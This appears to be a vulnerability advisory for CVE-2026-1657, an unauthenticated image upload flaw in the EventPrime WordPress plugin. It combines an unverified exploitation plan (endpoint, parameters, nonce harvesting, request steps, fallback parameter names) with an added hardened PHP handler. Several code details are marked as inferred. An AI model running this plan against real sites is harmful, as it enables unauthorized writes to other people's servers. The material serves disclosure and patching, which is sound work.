CVE-2026-1657

EventPrime <= 4.2.8.4 - Missing Authorization to Unauthenticated Image Upload via 'ep_upload_file_media' AJAX Endpoint

Type: Missing Authorization
Severity: Medium
CVSS Score: 5.3
Patched in: 4.2.8.5
Time to patch: 1d

Description

The EventPrime plugin for WordPress is vulnerable to unauthorized image file upload in all versions up to, and including, 4.2.8.4. This is due to the plugin registering the upload_file_media AJAX action as publicly accessible (nopriv-enabled) without implementing any authentication, authorization, or nonce verification despite a nonce being created. This makes it possible for unauthenticated attackers to upload image files to the WordPress uploads directory and create Media Library attachments via the ep_upload_file_media endpoint.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 4.2.8.4
Published: February 16, 2026
Last updated: February 17, 2026

Source Code

WordPress.org SVN
Research Plan
Unverified

Exploitation Research Plan: CVE-2026-1657

1. Vulnerability Summary

Vulnerability: Missing Authorization to Unauthenticated Image Upload.
Plugin: EventPrime – Events Calendar, Bookings and Tickets (slug: eventprime-event-calendar-management).
Affected Versions: <= 4.2.8.4.
Vulnerable Endpoint: admin-ajax.php via the ep_upload_file_media action.
Description: The plugin registers the ep_upload_file_media AJAX action for unauthenticated users (wp_ajax_nopriv_) but fails to implement any authorization checks (e.g., current_user_can), authentication requirements, or nonce verification. This allows an unauthenticated attacker to upload image files, which are then processed by WordPress and added to the Media Library.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: ep_upload_file_media
  • Method: POST
  • Required Capability: None (Unauthenticated)
  • Content-Type: multipart/form-data
  • Payload Parameters:
    • action: ep_upload_file_media
    • file: (The image file to be uploaded)
    • nonce: (Inferred) The code likely looks for a nonce parameter even if it doesn't verify it properly.

3. Code Flow (Inferred)

  1. Entry Point: admin-ajax.php receives a request with action=ep_upload_file_media.
  2. Hook Registration: The plugin registers the action in its AJAX handler class (likely includes/class-eventprime-ajax.php or similar):
    add_action('wp_ajax_ep_upload_file_media', array($this, 'ep_upload_file_media'));
    add_action('wp_ajax_nopriv_ep_upload_file_media', array($this, 'ep_upload_file_media'));
    
  3. Vulnerable Function: The ep_upload_file_media() function is invoked.
  4. Missing Check: The function proceeds to process $_FILES without calling check_ajax_referer() or current_user_can().
  5. Sink: The code likely uses media_handle_upload() or wp_handle_upload() to save the file and wp_insert_attachment() to register it in the database.
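The inferred code flow above lacks exactly two guards: a nonce check and a capability check. The following is an added example of how a WordPress AJAX upload handler looks with those guards in place; it is not EventPrime's code, the function name, nonce action name and field names are hypothetical, and it assumes the standard WordPress core APIs (check_ajax_referer, current_user_can, media_handle_upload).

```php
<?php
// Added example (not EventPrime's own code): a hardened AJAX upload handler.
// Names are hypothetical. The vulnerable pattern described in the advisory
// registered the same callback on wp_ajax_nopriv_ and processed $_FILES with
// neither check_ajax_referer() nor current_user_can(); both are restored here.

add_action( 'wp_ajax_ep_upload_file_media', 'example_ep_upload_file_media' );
// Deliberately NOT registered on wp_ajax_nopriv_: anonymous visitors receive
// admin-ajax.php's default "0" response and never reach the handler.

function example_ep_upload_file_media() {
    // 1. Nonce: 'ep_upload_file_media' is the assumed nonce action, 'nonce' the
    //    assumed POST field. Fails closed (dies with -1) on mismatch.
    check_ajax_referer( 'ep_upload_file_media', 'nonce' );

    // 2. Authorization: the core capability that governs Media Library writes.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // 3. Input presence and PHP upload status before touching the file.
    if ( empty( $_FILES['file'] ) || UPLOAD_ERR_OK !== $_FILES['file']['error'] ) {
        wp_send_json_error( array( 'message' => 'No file uploaded.' ), 400 );
    }

    // 4. Content check: extension and sniffed MIME type must agree, and only
    //    image types are accepted for this endpoint.
    $allowed = array( 'jpg|jpeg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif' );
    $check   = wp_check_filetype_and_ext( $_FILES['file']['tmp_name'], $_FILES['file']['name'], $allowed );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        wp_send_json_error( array( 'message' => 'Only JPEG, PNG or GIF images are accepted.' ), 415 );
    }

    // 5. Sink: core moves the file into uploads/ and creates the attachment;
    //    the same whitelist is enforced again inside wp_handle_upload().
    require_once ABSPATH . 'wp-admin/includes/file.php';
    require_once ABSPATH . 'wp-admin/includes/image.php';
    require_once ABSPATH . 'wp-admin/includes/media.php';
    $attachment_id = media_handle_upload( 'file', 0, array(), array( 'test_form' => false, 'mimes' => $allowed ) );
    if ( is_wp_error( $attachment_id ) ) {
        wp_send_json_error( array( 'message' => $attachment_id->get_error_message() ), 400 );
    }

    wp_send_json_success( array( 'id' => $attachment_id, 'url' => wp_get_attachment_url( $attachment_id ) ) );
}
```

If a public event-submission form genuinely requires anonymous uploads, the wp_ajax_nopriv_ registration can stay, but the nonce check, the image whitelist and a size limit must still run on that path, since current_user_can() is always false for a visitor.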

4. Nonce Acquisition Strategy

The vulnerability description states that a nonce is created but not verified. However, to ensure the request is processed correctly by any internal logic that might check for the presence of a parameter, we will attempt to retrieve it.

  1. Identify Script Localization: EventPrime typically localizes frontend settings in a global JS object.
  2. Shortcode Setup: The script is likely loaded on pages containing the Event Submission or Booking shortcodes.
    • Shortcode: [ep_event_submission] (inferred)
  3. Acquisition Steps:
    • Create a page with the shortcode: wp post create --post_type=page --post_status=publish --post_content='[ep_event_submission]'
    • Navigate to the page.
    • Use browser_eval to check for common EventPrime nonce objects:
      • window.ep_ajax?.nonce
      • window.eventprime_vars?.nonce
      • window.ep_frontend_options?.nonce

If no nonce is found or required, the exploit will proceed with a dummy or missing nonce parameter.

5. Exploitation Strategy

Step 1: Discover Parameters

Since the exact file parameter name might vary, the first step is to attempt an upload with the most common WordPress file parameter name (file).

Step 2: Multipart POST Request

Send the following request using the http_request tool:

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: multipart/form-data
  • Body:
    • action: ep_upload_file_media
    • file: (Binary content of a valid image, e.g., poc_image.png)
    • nonce: (Retrieved nonce or dummy value)

Step 3: Payload Construction

The payload should be a legitimate image file (PNG/JPG) to bypass basic getimagesize() or MIME-type checks often found in wp_handle_upload.

6. Test Data Setup

  1. Plugin Installation: Ensure EventPrime <= 4.2.8.4 is installed and active.
  2. Public Page:
    wp post create --post_type=page --post_title="Submit Event" --post_status=publish --post_content='[ep_event_submission]'
    
  3. Local File: Create a simple 1x1 pixel PNG file named exploit.png.

7. Expected Results

  • Response Code: 200 OK
  • Response Body: Usually a JSON response containing an attachment ID or the URL of the uploaded image. E.g., {"success":true,"data":{"id":123,"url":"..."}}.
  • Side Effect: A new entry appears in the wp_posts table with post_type='attachment' and the file exists in wp-content/uploads/Y/m/exploit.png.

8. Verification Steps

After executing the HTTP request, verify the upload via WP-CLI:

  1. Check Media Library:
     wp media list --fields=ID,post_title,file --format=table
     Look for exploit.png in the list.
  2. Verify File Existence:
     find /var/www/html/wp-content/uploads/ -name "exploit.png"
  3. Check Database Entry:
     wp db query "SELECT ID, post_title, post_type FROM wp_posts WHERE post_title='exploit' AND post_type='attachment';"

9. Alternative Approaches

If file is not the correct parameter name, try:

  • ep_file
  • upload_file
  • async-upload

If the request requires a specific event context, try adding a dummy event_id=1 or post_id=1 to the POST body.

If the nopriv action specifically checks for the Referer or User-Agent, ensure those match a standard browser request.
